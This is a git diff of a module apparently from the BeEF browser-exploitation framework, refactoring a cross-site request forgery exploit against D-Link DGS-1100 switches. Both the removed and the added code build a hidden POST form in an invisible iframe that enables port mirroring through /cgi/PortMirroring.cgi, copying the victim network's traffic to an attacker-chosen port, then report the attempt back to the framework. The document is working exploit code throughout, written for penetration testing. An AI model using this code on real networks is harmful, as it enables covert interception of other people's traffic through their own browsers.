diff --git a/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js b/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js index b3b807c25..65fa2a18a 100644 --- a/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js +++ b/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js @@ -10,45 +10,17 @@ beef.execute(function() { var totalports = parseInt('<%= @totalports %>'); var mirrorport = parseInt('<%= @mirrorport %>'); - var dlink_dgs_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', base + "/cgi/PortMirroring.cgi"); - form.setAttribute('method', 'POST'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'cEn'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'sTagP'); - input.setAttribute('value', mirrorport); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'sMode'); - input.setAttribute('value', 2); - form.appendChild(input); - var mask = ''; for (var i = 1; i <= totalports; i++) { mask += i == mirrorport ? "0" : "1"; } - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'SrcLst'); - input.setAttribute('value', mask); - form.appendChild(input); - - dlink_dgs_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/PortMirroring.cgi', 'POST', 'application/x-www-form-urlencoded', [ + { type: 'hidden', name: 'cEn', value: 1 }, + { type: 'hidden', name: 'sTagP', value: mirrorport }, + { type: 'hidden', name: 'sMode', value: 2 }, + { type: 'hidden', name: 'SrcLst', value: mask } + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");